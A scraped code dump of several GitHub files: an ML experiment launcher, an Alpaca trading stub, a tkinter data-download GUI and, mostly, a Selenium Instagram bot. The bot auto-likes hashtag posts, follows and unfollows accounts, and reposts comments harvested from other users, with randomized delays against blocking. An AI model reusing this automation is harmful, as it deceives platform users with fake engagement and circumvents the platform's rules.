lambda val: os.path.isdir(val)\n },\n {\n 'type': 'input',\n 'name': 'epochs',\n 'message': 'Number Epochs: ',\n 'default': '100',\n 'validate': lambda val: val.isnumeric() and int(val) > 0\n },\n {\n 'type': 'input',\n 'name': 'batch_size',\n 'message': 'Batch Size: ',\n 'default': '160',\n 'validate': lambda val: val.isnumeric() and int(val) > 0\n },\n {\n 'type': 'input',\n 'name': 'repeats',\n 'message': 'How many time should the experiment be repeated?',\n 'default': '5',\n 'validate': lambda val: val.isnumeric() and int(val) > 0\n }\n]\n\nquestions_figure_1 = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_1/config_clothing.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n },\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Which model should be trained: ',\n 'choices': ['ResNet18', 'ResNet50', 'densenet121', 'mobilenet_v2', 'inception_v3', 'googlenet']\n },\n {\n 'type': 'list',\n 'name': 'train_type',\n 'message': 'Type of training:',\n 'choices': [\"IRR\", \"Baseline\", \"Target\"]\n }\n]\nquestions_figure_1_if_target = [\n {\n 'type': 'input',\n 'name': 'irr_path',\n 'message': 'Path to IRR model:',\n 'validate': lambda val: os.path.isfile(val)\n }\n]\n\nquestions_figure_2_train_type = [\n {\n 'type': 'list',\n 'name': 'train_type',\n 'message': 'Type of training:',\n 'choices': [\"IRR\", \"Baseline\", \"Target\"]\n }\n]\n\nquestions_figure_2_baseline = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 
'src/scripts/figure_2/0_baseline/config.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'list',\n 'name': 'dataset',\n 'message': 'Type of training:',\n 'choices': [\"CIFAR10\", \"CIFAR100\", \"CINIC10\"]\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n },\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Model to be trained:',\n 'choices': ['ResNet18', 'ResNet34', 'ResNet50', 'densenet121',\n 'googlenet', 'inception_v3', 'mobilenet_v2', 'vgg11']\n },\n]\n\nquestions_figure_2_irr = [\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_2/1_big_model/config.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n }\n]\n\nquestions_figure_2_target = [\n {\n 'type': 'list',\n 'name': 'mode',\n 'message': 'Mode:',\n 'choices': ['Normal', 'No Holdout', 'Archtecture Transfer', 'Hyperparameter Transfer']\n },\n {\n 'type': 'input',\n 'name': 'config_path',\n 'message': 'Path to the experiment config:',\n 'default': os.path.join(os.path.dirname(os.path.realpath(__file__)),\n 'src/scripts/figure_2/1_big_model/config_target_local.json'),\n 'validate': lambda val: os.path.isfile(val)\n },\n {\n 'type': 'input',\n 'name': 'gpu',\n 'message': 'Index of GPU:',\n 'default': '0',\n 'validate': lambda val: val.isnumeric() and int(val) >= 0\n }\n]\n\nquestions_figure_2_target_architecture = [\n {\n 'type': 'list',\n 'name': 'model',\n 'message': 'Model:',\n 'choices': ['ResNet18', 'ResNet34', 'ResNet50', 'densenet121',\n 'googlenet', 'inception_v3', 'mobilenet_v2', 'vgg11']\n }\n]\n\n\ndef main():\n answers = prompt(questions, style=custom_style_2)\n selected_option = answers.get('user_option')\n\n arguments = []\n if selected_option == 'Figure 1':\n answers = prompt(questions_figure_1, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_1/generate_data.py',\n '-p', answers['config_path'],\n '-g', answers['gpu'],\n '-m', answers['model'],\n '-t', str(answers['train_type'] == 'IRR')]\n\n if answers['train_type'] == 'Target':\n irr_model = prompt(questions_figure_1_if_target, style=custom_style_2)['irr_path']\n arguments.append('-i')\n arguments.append(irr_model)\n print('Starting experiment for Figure 1!')\n elif selected_option == 'Figure 2':\n print('Starting experiment for Figure 2!')\n train_type = prompt(questions_figure_2_train_type, style=custom_style_2)['train_type']\n if train_type == 'Baseline':\n answers = prompt(questions_figure_2_baseline, style=custom_style_2)\n if answers['model'] == 'ResNet18':\n file = f'src/scripts/figure_2/0_baseline/generate_baseline_{answers[\"dataset\"].lower()}.py'\n arguments = [sys.executable or 'python', file, answers['config_path'], answers['gpu']]\n else:\n file = 'src/scripts/figure_2/5_architecture/train_base.py'\n arguments = [sys.executable or 'python', file,\n '-p', answers['config_path'],\n '-m', answers['model'],\n '-g', answers['gpu']]\n elif train_type == 'IRR':\n answers = prompt(questions_figure_2_irr, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/train_irr.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n elif train_type == 'Target':\n answers = 
prompt(questions_figure_2_target, style=custom_style_2)\n mode = answers['mode']\n if mode == 'Normal':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/train_target.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n if mode == 'No Holdout':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/3_no_holdout/train_target_no_holdout.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n if mode == 'Archtecture Transfer':\n model = prompt(questions_figure_2_target_architecture, style=custom_style_2)['model']\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/5_architecture/train_target.py',\n '-p', answers['config_path'],\n '-g', answers['gpu'],\n '-m', model]\n if mode == 'Hyperparameter Transfer':\n arguments = [sys.executable or 'python', 'src/scripts/figure_2/5_hyperparameter'\n '/train_target_gridsearch.py',\n '-p', answers['config_path'],\n '-g', answers['gpu']]\n\n elif selected_option == 'Figure 6':\n answers = prompt(questions_figure_6, style=custom_style_2)\n arguments = [sys.executable or 'python', 'src/scripts/figure_6/generate_figure_6_data.py',\n answers['batch_size'], answers['repeats'], answers['data_path'], answers['epochs']]\n print('Starting experiment for Figure 6!')\n\n try:\n p = Popen(arguments)\n except KeyboardInterrupt:\n p.send_signal(signal.SIGINT)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TNJKvm/stood-over-june","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":8896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16360796477","text":"import alpaca_trade_api as tradeapi\nimport time\n\n\ndef get_current_positions():\n api = tradeapi.REST() # insert credentials\n current_portfolio = api.list_positions()\n\n # Print the quantity of shares for each position.\n for position in current_portfolio:\n print(\"{} shares of {}\".format(position.qty, position.symbol))\n\n\ndef supervise_bought_stocks():\n while True:\n # open_positions = get_current_positions()\n time.sleep(100)\n","repo_name":"rbroesamle/ai-stock-trader","sub_path":"supervisor.py","file_name":"supervisor.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21782311292","text":"from tkinter import *\n\nfrom os.path import expanduser\nimport os\nfrom utils.handle_credentials import Window_save_credentials, read_credentials\nfrom utils.handle_download import start_download\n\nlogo_path = os.path.join(os.path.dirname(__file__) + \"\\\\img\\\\logo_open_mastr.ico\")\n\nwindow_title = \"open-MaStR Desktop\"\ncredentials_file_path = os.path.join(\n expanduser(\"~\"), \".open-MaStR\", \"config\", \"credentials2.cfg\"\n)\n\nroot = Tk()\nroot.title(window_title)\nroot.iconbitmap(logo_path)\nroot.geometry(\"400x400\")\n\n\n\"\"\"Frame Credentials\"\"\"\nframe_credentials = Frame(root, padx=10, pady=10)\nframe_credentials.pack(padx=5, pady=5)\n\nmastr_nr, mastr_token = read_credentials(credentials_file_path)\nlabel_mastr_nr = Label(frame_credentials, text=f\"MaStR-Nr.: {mastr_nr}\")\nlabel_mastr_token = Label(frame_credentials, text=f\"Token: {mastr_token}\")\n\nlabel_mastr_nr.grid(row=0, column=0)\nlabel_mastr_token.grid(row=1, column=0)\n\nsave_credentials_button = Button(\n frame_credentials,\n text=\"Edit MaStR Credentials\",\n command=lambda: Window_save_credentials(\n window_title=window_title,\n logo_path=logo_path,\n 
credentials_file_path=credentials_file_path,\n label_mastr_nr=label_mastr_nr,\n label_mastr_token=label_mastr_token,\n ),\n)\nsave_credentials_button.grid(row=2, column=0)\n\n\n\"\"\"Frame Download\"\"\"\nframe_download = Frame(root, padx=10, pady=10)\nframe_download.pack(padx=5, pady=5)\n\ndownload_button = Button(\n frame_download,\n text=\"Download MaStR\",\n command=lambda: start_download(),\n)\ndownload_button.grid(row=2, column=0)\n\n\n# Create event loop\nroot.mainloop()\n","repo_name":"FlorianK13/open-mastr-GUI","sub_path":"src/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17997462420","text":"#-*- coding: utf-8 -*-\n\nimport re\nimport log\nimport random\nimport telegrambot\nimport filewriter\nfrom time import sleep\nfrom crawler2 import Crawler\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime\n\nclass Instagram (Crawler):\n\n LOGIN_URL = 'https://www.instagram.com/accounts/login/?source=auth_switcher'\n TAG_URL = 'https://www.instagram.com/explore/tags/'\n UNFOLLOW_URL = 'https://www.instagram.com/kuhitlove/'\n FOLLOW_PER_LIKE = 3\n FOLLOW_CNT = 0\n FOLLOW_ACCEPT_CNT = 0\n FOLLOWING_CANCEL_CNT = 0\n LIKE_CNT = 0\n REPLY_CNT = 0\n FAIL_CNT = 0\n CRITICAL_CNT = 0\n FOLLOWER_CNT = 0\n FOLLOWING_CNT = 0\n REPLY = []\n FOLLOWERS = []\n FOLLOWINGS = []\n TARGET_NAME = ''\n\n starttime = datetime.now()\n\n def start(self):\n try:\n # if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n # raise Exception('site connect fail')\n #\n # self.following()\n # exit()\n\n # Load the security-block state\n self.security_code = filewriter.get_log_file('instagram_security_code')\n\n # If we are blocked, stop until a security_code has been entered\n if self.security_code[0] == 'blocked':\n log.logger.info('Instagram is blocked.')\n self.destroy()\n exit()\n\n # Load the copied tag list\n self.tag = filewriter.get_log_file('instagramcollecttag_copied')\n\n # If the copy does not exist, create it from the tag file\n if self.tag is None or len(self.tag) == 0:\n self.tag = filewriter.get_log_file('instagramcollecttag')\n filewriter.save_log_file('instagramcollecttag_copied', self.tag)\n\n # If no tags could be loaded, stop\n if self.tag is None:\n self.destroy()\n exit()\n\n # Shuffle the tags randomly\n random.shuffle(self.tag)\n\n self.login()\n\n # self.driver.save_screenshot('instagram_screenshot.png')\n # self.destroy()\n # exit()\n\n # Start working\n\n # Reconcile followers\n if self.follower() is True:\n # Clean up followings\n self.following()\n\n # Start scanning\n self.scan_page()\n\n self.end_report()\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.end_report()\n\n def end_report(self):\n duration = int((datetime.now() - self.starttime).total_seconds() / 60)\n log.logger.info('[durations %d min] Instagram process has completed. FOLLOWER_CNT (%d),FOLLOWING_CNT (%d),FOLLOW_CNT (%d), LIKE_CNT (%d), REPLY_CNT (%d), FOLLOW_ACCEPT_CNT (%d), FOLLOWING_CANCEL_CNT (%d), FAIL_CNT (%d)' % (duration, self.FOLLOWER_CNT, self.FOLLOWING_CNT, self.FOLLOW_CNT, self.LIKE_CNT, self.REPLY_CNT, self.FOLLOW_ACCEPT_CNT, self.FOLLOWING_CANCEL_CNT, self.FAIL_CNT))\n\n # For now, report the results via Telegram\n telegrambot.send_message('[durations %d min] Instagram process has completed. FOLLOWER_CNT (%d),FOLLOWING_CNT (%d),FOLLOW_CNT (%d), LIKE_CNT (%d), REPLY_CNT (%d), FOLLOW_ACCEPT_CNT (%d), FOLLOWING_CANCEL_CNT (%d), FAIL_CNT (%d)' % (duration, self.FOLLOWER_CNT, self.FOLLOWING_CNT, self.FOLLOW_CNT, self.LIKE_CNT, self.REPLY_CNT, self.FOLLOW_ACCEPT_CNT, self.FOLLOWING_CANCEL_CNT, self.FAIL_CNT), 'instagram')\n\n self.FOLLOW_CNT = 0\n self.LIKE_CNT = 0\n self.REPLY_CNT = 0\n self.FAIL_CNT = 0\n self.REPLY = []\n\n self.destroy()\n exit()\n\n # log.logger.info('Waiting browser rebooting.... (2 min)')\n #\n # # Wait 2 minutes\n # sleep(60 * 2)\n #\n # # If errors keep repeating, send a Telegram message and stop\n # if self.CRITICAL_CNT > 2:\n # telegrambot.send_message('Instagram bot has just stopped!!!!', 'instagram')\n # exit()\n #\n # self.start()\n\n def login(self):\n try:\n # Check whether we are already logged in\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n self.get_cookie()\n\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium',\n is_chrome=True) is False:\n raise Exception('site connect fail')\n\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[3]/div/span/a[1]/button') is False:\n log.logger.info('Already logged in.')\n return True\n except:\n pass\n\n # If not logged in, go to the login page\n if self.connect(site_url=self.LOGIN_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n # Load the account credentials\n account_data = filewriter.get_log_file(self.name + '_account')\n\n if account_data:\n if self.selenium_extract_by_xpath(tag={'tag': 'input', 'attr': 'name', 'name': 'username'}) is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # Enter the username\n if self.selenium_input_text_by_xpath(text=account_data[0], tag={'tag': 'input', 'attr': 'name', 'name': 'username'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. username')\n\n # Enter the password\n if self.selenium_input_text_by_xpath(text=account_data[1], tag={'tag': 'input', 'attr': 'name', 'name': 'password'}) is False:\n raise Exception('selenium_input_text_by_xpath fail. password')\n\n # Click the login button\n if self.selenium_click_by_xpath(tag={'tag': 'button', 'attr': 'type', 'name': 'submit'}) is False:\n raise Exception('selenium_click_by_xpath fail. submit')\n\n sleep(3)\n\n # Handle the \"unusual login attempt\" prompt (\"This Was Me\")\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/div[2]/span/button') is True:\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/div[2]/span/button')\n except:\n pass\n\n # Security code challenge\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[1]/div/p') is True:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/span/button') is True:\n\n # If no security code is available, mark the account blocked and stop the Instagram process\n if self.security_code[0] == '':\n self.security_code[0] = 'blocked'\n filewriter.save_log_file('instagram_security_code', self.security_code)\n log.logger.info('Instagram has just been blocked.')\n telegrambot.send_message('Instagram has just been blocked.', 'instagram')\n self.destroy()\n exit()\n\n # Send the code\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[3]/form/span/button')\n\n # Telegram notification\n telegrambot.send_message('Please check the Instagram security code from your email within 1 minute.', 'instagram')\n log.logger.info('Please check the Instagram security code from your email within 1 minute.')\n\n # Wait 50 seconds for the file to be updated\n sleep(50)\n\n # Reload the newly entered data.\n self.security_code = filewriter.get_log_file('instagram_security_code')\n\n # Enter the security code\n if self.selenium_input_text_by_xpath(text=self.security_code[0], xpath='//*[@id=\"security_code\"]') is False:\n raise Exception('selenium_input_text_by_xpath fail. security_code')\n\n # Submit\n self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/div/div/div[2]/form/span/button')\n\n log.logger.info('security_code. (%s)' % (self.security_code[0]))\n\n # Remove the used code\n self.security_code[0] = ''\n filewriter.save_log_file('instagram_security_code', self.security_code)\n\n sleep(5)\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n pass\n\n try:\n if self.selenium_exist_by_xpath(xpath='//*[@id=\"react-root\"]/section/nav/div[2]/div/div/div[3]/div/div/div/div/div[3]/div[1]/a') is True:\n log.logger.info('login fail.')\n raise Exception('login fail error')\n except:\n pass\n\n log.logger.info('login success!')\n\n self.set_cookie()\n\n sleep(2)\n\n return True\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.end_report()\n\n return False\n\n def scan_page(self):\n try:\n if self.FAIL_CNT > 3:\n raise Exception('Block error')\n\n if self.connect(site_url=self.TAG_URL + self.tag[0] + '/', is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n if self.selenium_extract_by_xpath(tag={'tag': 'div', 'attr': 'class', 'name': 'EZdmt'}) is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # Top posts at the top of the page (up to 9)\n list = self.driver.find_element_by_xpath(\"//div[@class='EZdmt']\").find_elements_by_xpath('.//div[contains(@class,\"v1Nh3\")]/a')\n\n for li in list:\n try:\n self.is_need_sleep = False\n\n # Open the post overlay\n li.click()\n\n # Wait for the overlay\n if self.selenium_extract_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # Channel (account) name\n target_name = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[1]/h2/a')\n if target_name:\n self.TARGET_NAME = target_name.text\n\n # If there are no replies to reuse yet, only collect first\n if len(self.REPLY) == 0:\n self.reply_collect()\n self.selenium_click_by_xpath(xpath='//button[contains(@class,\"ckWGn\")]')\n continue\n\n
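 # NOTE (added): engagement pipeline for each top post - like it, and on every\n # FOLLOW_PER_LIKE-th like also follow the author and post a harvested comment;\n # the randomized sleep afterwards acts as a crude rate limiter against Instagram's anti-bot checks.\n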
 if self.like() is True:\n self.follow()\n self.reply_collect()\n self.reply_send()\n\n # If any action was taken, sleep to avoid a block\n if self.is_need_sleep is True:\n #sleep_second = random.randint(180, 200)\n sleep_second = random.randint(50, 60)\n #log.logger.info('sleeping.. %d' % (sleep_second))\n sleep(sleep_second)\n self.is_need_sleep = True\n\n # Close the overlay\n self.selenium_click_by_xpath(xpath='//button[contains(@class,\"ckWGn\")]')\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n self.FAIL_CNT = self.FAIL_CNT + 1\n\n break\n\n self.tag.pop(0)\n filewriter.save_log_file('instagramcollecttag_copied', self.tag)\n\n self.CRITICAL_CNT = 0\n\n # Reset the browser every 100 follows\n duration = int((datetime.now() - self.starttime).total_seconds() / 60)\n # print(duration)\n # Stop after 10 minutes of work\n if duration > 10:\n # if (self.FOLLOW_CNT > 5):\n return True\n\n if len(self.tag) > 0:\n self.scan_page()\n\n except Exception as e:\n self.CRITICAL_CNT = self.CRITICAL_CNT + 1\n log.logger.error(e, exc_info=True)\n\n # Remove the tag\n tag_copy = filewriter.get_log_file('instagramcollecttag_copied')\n if tag_copy:\n tag_copy.remove(self.tag[0])\n filewriter.save_log_file('instagramcollecttag_copied', tag_copy)\n\n tag = filewriter.get_log_file('instagramcollecttag')\n if tag:\n tag.remove(self.tag[0])\n filewriter.save_log_file('instagramcollecttag', tag)\n\n self.end_report()\n\n # Follow\n def follow(self):\n try:\n # Follow only once every n likes\n if self.LIKE_CNT % self.FOLLOW_PER_LIKE != 0:\n return True\n\n btn_follow = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[2]/button')\n\n if btn_follow:\n # ('팔로우' is Instagram's Korean UI label for \"Follow\"; kept as data)\n if '팔로우' in btn_follow.text or 'Follow' == btn_follow.text:\n # Click the follow button\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/header/div[2]/div[1]/div[2]/button')\n self.FOLLOW_CNT = self.FOLLOW_CNT + 1\n self.is_need_sleep = True\n\n if self.TARGET_NAME:\n log.logger.info('follow. (%s)' % (self.TARGET_NAME))\n\n # # Photo analysis (the Korean reply strings below are data and are left untranslated)\n # try:\n # reply_prev = ''\n #\n # photo_analytics = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[1]/div/div/div[1]').find_element_by_xpath('.//img')\n #\n # if photo_analytics:\n # photo_analytics_text = photo_analytics.get_attribute(\"alt\")\n # if photo_analytics_text:\n # if any(word in photo_analytics_text for word in ['selfie']):\n # reply_prev = '외모가 미쳤다!! '\n # elif any(word in photo_analytics_text for word in ['1 person']):\n # reply_prev = '멋짐이 폭팔 '\n # elif any(word in photo_analytics_text for word in ['food']):\n # reply_prev = '아 배고파......ㅜ '\n # elif any(word in photo_analytics_text for word in ['nature']):\n # reply_prev = '사진 퀄리티 대박........ '\n # elif any(word in photo_analytics_text for word in ['dog']):\n # reply_prev = '멍멍이 귀욤귀욤~ '\n #\n # print(photo_analytics_text)\n # except Exception as e:\n # log.logger.error(e, exc_info=True)\n #\n #\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # Post a comment\n def reply_send(self):\n try:\n # Comment only once every n likes\n if self.LIKE_CNT % self.FOLLOW_PER_LIKE != 0:\n return True\n\n # Open the comment box\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[2]/button')\n\n # If Chrome rejects the comment text, drop it and try the next one\n while (True):\n try:\n # Stop if no comments are left\n if len(self.REPLY) == 0:\n break\n\n # Type the comment\n if self.selenium_input_text_by_xpath(text=self.REPLY[0], xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[3]/div/form/textarea') is True:\n # Press Enter\n self.selenium_enterkey_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[3]/div/form/textarea')\n log.logger.info('%s' % (self.REPLY[0]))\n # log.logger.info(self.REPLY)\n self.REPLY_CNT = self.REPLY_CNT + 1\n self.REPLY.pop(0)\n break\n\n self.REPLY.pop(0)\n except Exception:\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n # return False\n\n return False\n\n # Like\n def like(self):\n try:\n # Like button\n btn_like = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[1]/button/span')\n\n if btn_like:\n if 'grey' in btn_like.get_attribute(\"class\"):\n # Click the like button\n self.selenium_click_by_xpath(xpath='//article[contains(@class,\"M9sTE\")]/div[2]/section[1]/span[1]/button')\n self.LIKE_CNT = self.LIKE_CNT + 1\n self.is_need_sleep = True\n log.logger.info('Liked.')\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # Collect comments\n def reply_collect(self):\n try:\n group_reply = self.driver.find_element_by_xpath('//article[contains(@class,\"M9sTE\")]/div[2]/div[1]/ul')\n if group_reply:\n soup_list_reply = BeautifulSoup(group_reply.get_attribute('innerHTML'), 'html.parser')\n for reply in soup_list_reply.find_all('li'):\n try:\n if reply:\n soup_reply = reply.find('div', class_='C4VMK').find('span')\n if soup_reply:\n if soup_reply.a:\n soup_reply.a.clear()\n reply_text = soup_reply.getText().strip()\n # print('%s (%d)' % (reply_text, len(reply_text)))\n # Allowed phrases (the Korean keyword lists are matching data and are left untranslated)\n if any(word in reply_text for word in ['선팔', '맞팔', '소통해', '소통하', '잘보고', '잘보구', '구경']):\n # Length limit\n if len(reply_text) > 30:\n continue\n # Banned phrases\n if any(word in reply_text for word in ['넹','필라','요가','군요','귀','입니다','염','덕','레슨','맘', '육아', '#', '무료', '신발', '그램', '진행', '세', '셔', '운동', '이쁘', '이뻐', '예', '쁜', '님', '가세요', '?', '부탁', '방문', '옷', '몸','누나','옆구리','있는','다시','팀장','사업']):\n continue\n\n # Collapse whitespace\n reply_text = re.sub(' +', ' ', reply_text)\n log.logger.info('%s' % (reply_text))\n\n # Add to the reply list\n if reply_text not in self.REPLY:\n self.REPLY.append(reply_text)\n except Exception:\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n # return False\n\n return False\n\n
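 # NOTE (added): follower() below reconciles the follower list - it opens the profile's\n # follower dialog, scrolls it to the end, follows back anyone we do not follow yet, and\n # caches the follower ids in self.FOLLOWERS for following() to use.\n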
 # Reconcile followers\n def follower(self):\n try:\n if self.connect(site_url=self.UNFOLLOW_URL, is_proxy=False, default_driver='selenium', is_chrome=True) is False:\n raise Exception('site connect fail')\n\n if self.selenium_click_by_xpath(xpath='//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n if self.selenium_extract_by_xpath(xpath='/html/body/div[3]/div/div[2]/ul/div/li[1]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # Scroll down to load everything\n if self.scroll_bottom(selectorParent='document.getElementsByClassName(\"isgrP\")[0]', selectorDom='document.getElementsByClassName(\"_6xe7A\")[0]', limit_page=40) is False:\n raise Exception('scroll bottom fail.')\n\n # Click follow for accounts that are not yet mutual\n list = self.driver.find_elements_by_xpath('/html/body/div[3]/div/div[2]/ul/div/li')\n\n for li in list:\n try:\n accept_follow = li.find_element_by_xpath('.//button[text() = \"Follow\"]')\n if accept_follow:\n accept_follow.click()\n\n channel_follow = li.find_element_by_xpath('.//a[contains(@class,\"FPmhX\")]')\n if channel_follow:\n id_following_accepted = channel_follow.text\n log.logger.info('following accepted. (%s)' % (id_following_accepted))\n\n self.FOLLOW_ACCEPT_CNT = self.FOLLOW_ACCEPT_CNT + 1\n sleep(2)\n except Exception as e:\n continue\n\n followers = self.driver.find_element_by_xpath('/html/body/div[3]/div/div[2]/ul')\n if followers:\n soup_list_follewers = BeautifulSoup(followers.get_attribute('innerHTML'), 'html.parser')\n for follower in soup_list_follewers.find_all('li'):\n try:\n if follower:\n soup_follower_link = follower.find('a', class_='FPmhX')\n if soup_follower_link:\n follower_id = soup_follower_link.getText().strip()\n # print('%s' % (follower_id))\n\n # Add to the follower list\n if follower_id not in self.FOLLOWERS:\n self.FOLLOWERS.append(follower_id)\n except Exception:\n continue\n\n # print(self.FOLLOWERS)\n log.logger.info('followers list. (%s)' % (','.join(self.FOLLOWERS)))\n\n self.selenium_click_by_xpath(xpath='/html/body/div[3]/div/div[1]/div/div[2]/button')\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n
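 # NOTE (added): following() below trims the following list - it compares the following\n # and follower counts (keeping a buffer of 150), then walks the following dialog from\n # the bottom and unfollows accounts that never followed back.\n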
 # Clean up followings\n def following(self):\n try:\n # Current follower and following counts\n follower = self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[2]/a/span')\n if follower:\n soup_follewer = BeautifulSoup(follower.get_attribute('innerHTML'), 'html.parser')\n self.FOLLOWER_CNT = soup_follewer.getText().strip()\n self.FOLLOWER_CNT = int(self.FOLLOWER_CNT.replace(',', ''))\n\n following = self.driver.find_element_by_xpath('//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a/span')\n if following:\n soup_following = BeautifulSoup(following.get_attribute('innerHTML'), 'html.parser')\n self.FOLLOWING_CNT = soup_following.getText().strip()\n self.FOLLOWING_CNT = int(self.FOLLOWING_CNT.replace(',', ''))\n\n gap_follow = self.FOLLOWING_CNT - self.FOLLOWER_CNT - 150\n\n log.logger.info('FOLLOWER_CNT (%d)' % (self.FOLLOWER_CNT))\n log.logger.info('FOLLOWING_CNT (%d)' % (self.FOLLOWING_CNT))\n log.logger.info('gap_follow (%d)' % (gap_follow))\n\n if gap_follow < 0:\n return True\n\n if self.selenium_click_by_xpath(\n xpath='//*[@id=\"react-root\"]/section/main/div/header/section/ul/li[3]/a') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n if self.selenium_extract_by_xpath(xpath='/html/body/div[3]/div/div[2]/ul/div/li[1]') is False:\n raise Exception('selenium_extract_by_xpath fail.')\n\n # Scroll down to load everything\n if self.scroll_bottom(selectorParent='document.getElementsByClassName(\"isgrP\")[0]', selectorDom='document.getElementsByClassName(\"_6xe7A\")[0]', limit_page=20) is False:\n raise Exception('scroll bottom fail.')\n\n # Cancel follows starting from the bottom\n list = self.driver.find_elements_by_xpath('/html/body/div[3]/div/div[2]/ul/div/li')\n\n for li in reversed(list):\n try:\n # Stop after 30 cancellations within 15 minutes\n # if self.FOLLOWING_CANCEL_CNT >= self.FOLLOW_CNT + 1:\n # if self.FOLLOWING_CANCEL_CNT >= self.FOLLOW_CNT + self.FOLLOW_ACCEPT_CNT:\n if gap_follow < 0:\n break\n\n elem_following = li.find_element_by_xpath('.//a[contains(@class,\"FPmhX\")]')\n if elem_following:\n id_following = elem_following.text\n if id_following not in self.FOLLOWERS:\n cancel_following = li.find_element_by_xpath('.//button[contains(@class,\"_8A5w5\")]')\n if cancel_following:\n cancel_following.click()\n self.selenium_click_by_xpath(xpath='/html/body/div[4]/div/div/div[3]/button[1]')\n self.FOLLOWING_CANCEL_CNT = self.FOLLOWING_CANCEL_CNT + 1\n log.logger.info('following canceled. (%s)' % (id_following))\n gap_follow = gap_follow - 1\n sleep(25)\n except Exception as e:\n log.logger.error(e, exc_info=True)\n gap_follow = gap_follow - 1\n continue\n\n return True\n\n except Exception as e:\n log.logger.error(e, exc_info=True)\n\n return False\n\n # Scroll to the very bottom\n def 